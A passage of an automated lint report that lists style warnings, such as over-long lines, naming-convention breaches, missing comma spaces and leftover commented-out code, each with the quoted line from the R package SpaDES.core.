dimension\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:37:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/inst/sampleModules/randomLandscapes/randomLandscapes.R#L37) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".plotInitialTime\", \"numeric\", start(sim), start(sim), NA, \"time to schedule first plot event\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:38:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/inst/sampleModules/randomLandscapes/randomLandscapes.R#L38) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".plotInterval\", \"numeric\", NA_real_, NA, NA, \"time interval between plot events\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:39:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/inst/sampleModules/randomLandscapes/randomLandscapes.R#L39) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInitialTime\", \"numeric\", NA_real_, NA, NA, \"time to schedule first save event\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:40:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/inst/sampleModules/randomLandscapes/randomLandscapes.R#L40) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInterval\", \"numeric\", NA_real_, NA, NA, \"time interval between save events\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:41:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/inst/sampleModules/randomLandscapes/randomLandscapes.R#L41) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".useCache\", \"logical\", FALSE, c(\"init\", \"plot\"), NA, \"should the module result be cached for future use\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:55:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/inst/sampleModules/randomLandscapes/randomLandscapes.R#L55) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.randomLandscapes <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:75:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/inst/sampleModules/randomLandscapes/randomLandscapes.R#L75) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim) + P(sim)$.saveInterval, \"randomLandscapes\", \"save\", .last() + 1)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:86:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/inst/sampleModules/randomLandscapes/randomLandscapes.R#L86) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Init <- function(sim) {\n^~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:100:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/inst/sampleModules/randomLandscapes/randomLandscapes.R#L100) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DEM <- gaussMap(template, scale = 300, var = 0.03, speedup = speedup, inMemory = inMemory)\n    ^~~\n```\n[inst/sampleModules/SpaDES_sampleModules/SpaDES_sampleModules.R:17:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/inst/sampleModules/SpaDES_sampleModules/SpaDES_sampleModules.R#L17) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".plotInitialTime\", \"numeric\", NA_real_, NA, NA, \"This describes the simulation time at which the first plot event should occur\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/SpaDES_sampleModules/SpaDES_sampleModules.R:18:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/inst/sampleModules/SpaDES_sampleModules/SpaDES_sampleModules.R#L18) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInitialTime\", \"numeric\", NA_real_, NA, NA, \"This describes the simulation time at which the first save event should occur\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:231:50:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/cache.R#L231) *style:* **Commas should always have a space after.**\n```r\n​          cat(crayon::blue(\"  Using \", fromWhere,\" copy of\", cur$moduleName, \"module\\n\"))\n                                                 ^\n```\n[R/cache.R:242:50:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/cache.R#L242) *style:* **Commas should always have a space after.**\n```r\n​          cat(crayon::blue(\"  Using \", fromWhere,\" copy of\", cur$eventType, \"event in\",\n                                                 ^\n```\n[R/cache.R:289:10:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/cache.R#L289) *style:* **Commented code should be removed.**\n```r\n​        #checkPath(cacheRepo, create = TRUE) #SpaDES dependency\n         ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:365:14:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/cache.R#L365) *style:* **Commented code should be removed.**\n```r\n​            #object2@events <- unique(rbindlist(list(object@events, object2@events)))\n             ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:380:10:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/cache.R#L380) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​      for(atts in attrsToGrab) {\n         ^\n```\n[R/cache.R:384:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/cache.R#L384) *style:* **Commented code should be removed.**\n```r\n​      # attr(object2, \"tags\") <- attr(object, \"tags\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:385:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/cache.R#L385) *style:* **Commented code should be removed.**\n```r\n​      # attr(object2, \"call\") <- attr(object, \"call\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:386:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/cache.R#L386) *style:* **Commented code should be removed.**\n```r\n​      # attr(object2, \"function\") <- attr(object, \"function\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:425:66:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/cache.R#L425) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  setGeneric(\".addTagsToOutput\", function(object, outputObjects, FUN) {\n                                                                 ^~~\n```\n[R/cache.R:448:48:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/cache.R#L448) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  definition = function(object, outputObjects, FUN, preDigestByClass) {\n                                               ^~~\n```\n[R/cache.R:540:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/cache.R#L540) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​objSize.simList <- function(x, quick = getOption(\"reproducible.quick\", FALSE)) {\n^~~~~~~~~~~~~~~\n```\n[R/cache.R:567:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/cache.R#L567) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​makeMemoiseable.simList <- function(x) {\n^~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:575:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/cache.R#L575) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​unmakeMemoiseable.simList_ <- function(x) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/checkpoint.R:36:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/checkpoint.R#L36) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.checkpoint <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:86:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/code-checking.R#L86) *style:* **Lines should not be more than 100 characters.**\n```r\n​                xAsCall <- .isLastLineSim(x = x, xAsString = bb[seq(funStarts[yy], funEnds[yy + 1])])\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:90:16:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/code-checking.R#L90) *style:* **Commented code should be removed.**\n```r\n​              #y = strsplit(bb[funStarts[yy]], split = \"\\\\s+\")[[1]][1]\n               ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:91:53:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/code-checking.R#L91) *style:* **Commas should always have a space after.**\n```r\n​              y <- paste0(cantCodeCheckMessage, \"'\",bb[funStarts[yy]], \"'\")\n                                                    ^\n```\n[R/code-checking.R:144:39:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/code-checking.R#L144) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​    if (identical(type, \"returnSim\")) { # This is intended for only the last line of a function\n                                      ^\n```\n[R/code-checking.R:182:48:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/code-checking.R#L182) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​      } else if (identical(x[[1]], quote(`<-`)) ) {\n                                               ^\n```\n[R/code-checking.R:185:62:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/code-checking.R#L185) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​            if (any(grepl(x[[2]][[2]], pattern = \".envir\"))) {# i.e., sim@.envir\n                                                             ^\n```\n[R/code-checking.R:202:19:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/code-checking.R#L202) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​          x <- x[-(1:2)]\n                  ^\n```\n[R/code-checking.R:218:29:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/code-checking.R#L218) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​          x[[2]] <- x[[2]][-(1:2)]\n                            ^\n```\n[R/code-checking.R:286:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/code-checking.R#L286) *style:* **Lines should not be more than 100 characters.**\n```r\n​  allChecks <- list(simAssigns = simAssigns, simGets = simGets, returnsSim = returnsSim, assignToSim = assignToSim, fg = fg)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:319:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/code-checking.R#L319) *style:* **Lines should not be more than 100 characters.**\n```r\n​    allChecks[anyCantCodeCheck] <- lapply(names(cantCodeCheck[anyCantCodeCheck]), function(objName) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:368:51:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/code-checking.R#L368) *style:* **Commas should always have a space after.**\n```r\n​                                              \" \",verb,\" declared in outputObjects, \",\n                                                  ^\n```\n[R/code-checking.R:368:56:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/code-checking.R#L368) *style:* **Commas should always have a space after.**\n```r\n​                                              \" \",verb,\" declared in outputObjects, \",\n                                                       ^\n```\n[R/code-checking.R:384:20:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/code-checking.R#L384) *style:* **Commas should always have a space after.**\n```r\n​               \" \",verb,\" declared in inputObjects, \",\n                   ^\n```\n[R/code-checking.R:384:25:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/code-checking.R#L384) *style:* **Commas should always have a space after.**\n```r\n​               \" \",verb,\" declared in inputObjects, \",\n                        ^\n```\n[R/code-checking.R:395:90:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/code-checking.R#L395) *style:* **Commas should always have a space after.**\n```r\n​                                       paste0(paste(missingFrmMod, collapse = \", \"), \" \",verb,\n                                                                                         ^\n```\n[R/code-checking.R:440:75:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/code-checking.R#L440) *style:* **Commas should always have a space after.**\n```r\n​             \" but only for the 'get' functions, not the 'set' function \",\"\n                                                                          ^\n```\n[R/code-checking.R:454:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/code-checking.R#L454) *style:* **Lines should not be more than 100 characters.**\n```r\n​    missingInMetadata <- simAssignsNotInDotInputObjects[!(simAssignsNotInDotInputObjects %in% outputObjNames)]\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:463:24:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/code-checking.R#L463) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" assigned to sim inside \",\n                       ^\n```\n[R/code-checking.R:463:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/code-checking.R#L463) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" assigned to sim inside \",\n                                   ^\n```\n[R/code-checking.R:464:33:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/code-checking.R#L464) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in outputObjects\")\n                                ^\n```\n[R/code-checking.R:464:45:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/code-checking.R#L464) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in outputObjects\")\n                                            ^\n```\n[R/code-checking.R:471:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/code-checking.R#L471) *style:* **Lines should not be more than 100 characters.**\n```r\n​    missingInMetadata <- simAssignsInDotInputObjects[!(simAssignsInDotInputObjects %in% inputObjNames)]\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:480:24:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/code-checking.R#L480) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" assigned to sim inside \",\n                       ^\n```\n[R/code-checking.R:480:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/code-checking.R#L480) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" assigned to sim inside \",\n                                   ^\n```\n[R/code-checking.R:481:33:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/code-checking.R#L481) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in inputObjects\")\n                                ^\n```\n[R/code-checking.R:481:45:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/code-checking.R#L481) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in inputObjects\")\n                                            ^\n```\n[R/code-checking.R:503:24:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/code-checking.R#L503) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" used from sim inside \",\n                       ^\n```\n[R/code-checking.R:503:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/code-checking.R#L503) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" used from sim inside \",\n                                   ^\n```\n[R/code-checking.R:504:33:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/code-checking.R#L504) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in inputObjects\")\n                                ^\n```\n[R/code-checking.R:504:45:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/code-checking.R#L504) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in inputObjects\")\n                                            ^\n```\n[R/code-checking.R:516:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/code-checking.R#L516) *style:* **Commas should always have a space after.**\n```r\n​        \" \",verb,\" used from sim inside \",\n            ^\n```\n[R/code-checking.R:516:18:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/code-checking.R#L516) *style:* **Commas should always have a space after.**\n```r\n​        \" \",verb,\" used from sim inside \",\n                 ^\n```\n[R/code-checking.R:518:18:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/code-checking.R#L518) *style:* **Commas should always have a space after.**\n```r\n​        \", but \",verb,\" not declared in inputObjects\"\n                 ^\n```\n[R/code-checking.R:518:23:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/code-checking.R#L518) *style:* **Commas should always have a space after.**\n```r\n​        \", but \",verb,\" not declared in inputObjects\"\n                      ^\n```\n[R/code-checking.R:661:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/code-checking.R#L661) *style:* **Commented code should be removed.**\n```r\n​    #unique(pd[outerWh, \"line1\"])\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:665:34:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/code-checking.R#L665) *style:* **Commas should always have a space after.**\n```r\n​      whInner <- any((pd[outerWh,\"line1\"] < lwf) & (pd[outerWh,\"line2\"] > lwf) )\n                                 ^\n```\n[R/code-checking.R:665:64:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/code-checking.R#L665) *style:* **Commas should always have a space after.**\n```r\n​      whInner <- any((pd[outerWh,\"line1\"] < lwf) & (pd[outerWh,\"line2\"] > lwf) )\n                                                               ^\n```\n[R/code-checking.R:665:79:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/code-checking.R#L665) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​      whInner <- any((pd[outerWh,\"line1\"] < lwf) & (pd[outerWh,\"line2\"] > lwf) )\n                                                                              ^\n```\n[R/copy.R:37:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/copy.R#L37) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​            sim_ <- object\n            ^~~~\n```\n[R/downloadData.R:54:96:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/downloadData.R#L54) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    io <- .parseModulePartial(sim, modules = list(module), defineModuleElement = \"inputObjects\" )\n                                                                                               ^\n```\n[R/downloadData.R:242:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/downloadData.R#L242) *style:* **Commented code should be removed.**\n```r\n​    # parsedModule <- parse(file = file.path(path, module, paste0(module, '.R')))\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/downloadData.R:243:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/downloadData.R#L243) *style:* **Commented code should be removed.**\n```r\n​    # urls <- .getSourceURL(pattern = fileToDownload, x = parsedModule)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/downloadData.R:250:8:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/downloadData.R#L250) *style:* **Commented code should be removed.**\n```r\n​      #urls <- moduleMetadata(module, path)$inputObjects$sourceURL\n       ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/downloadData.R:262:27:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/downloadData.R#L262) *style:* **Commas should always have a space after.**\n```r\n​    chksums2 <- chksums[0,]\n                          ^\n```\n[R/downloadData.R:263:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/downloadData.R#L263) *style:* **Commented code should be removed.**\n```r\n​    #children <- moduleMetadata(module, path)$childModules\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/downloadData.R:266:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/downloadData.R#L266) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( all( nzchar(children) & !is.na(children) ) ) {\n            ^\n```\n[R/downloadData.R:266:18:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/downloadData.R#L266) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( all( nzchar(children) & !is.na(children) ) ) {\n                 ^\n```\n[R/downloadData.R:266:54:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/downloadData.R#L266) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( all( nzchar(children) & !is.na(children) ) ) {\n                                                     ^\n```\n[R/downloadData.R:266:56:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/downloadData.R#L266) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( all( nzchar(children) & !is.na(children) ) ) {\n                                                       ^\n```\n[R/experiment.R:200:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/experiment.R#L200) *style:* **Commented code should be removed.**\n```r\n​    #sim <- Copy(sim, objects = FALSE, queues = TRUE)\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:215:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/experiment.R#L215) *style:* **Commented code should be removed.**\n```r\n​    # cl <- tryCatch(getCluster(), error = function(x) NULL)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:216:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/experiment.R#L216) *style:* **Commented code should be removed.**\n```r\n​    # on.exit(if (!is.null(cl)) returnCluster(), add = TRUE)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:218:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/experiment.R#L218) *style:* **Commented code should be removed.**\n```r\n​    #if (length(modules) == 0) modules <- list(modules(sim)[-(1:4)])\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:222:11:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/experiment.R#L222) *style:* **Commented code should be removed.**\n```r\n​        # unlist(params[paramsTmp], recursive = FALSE)\n          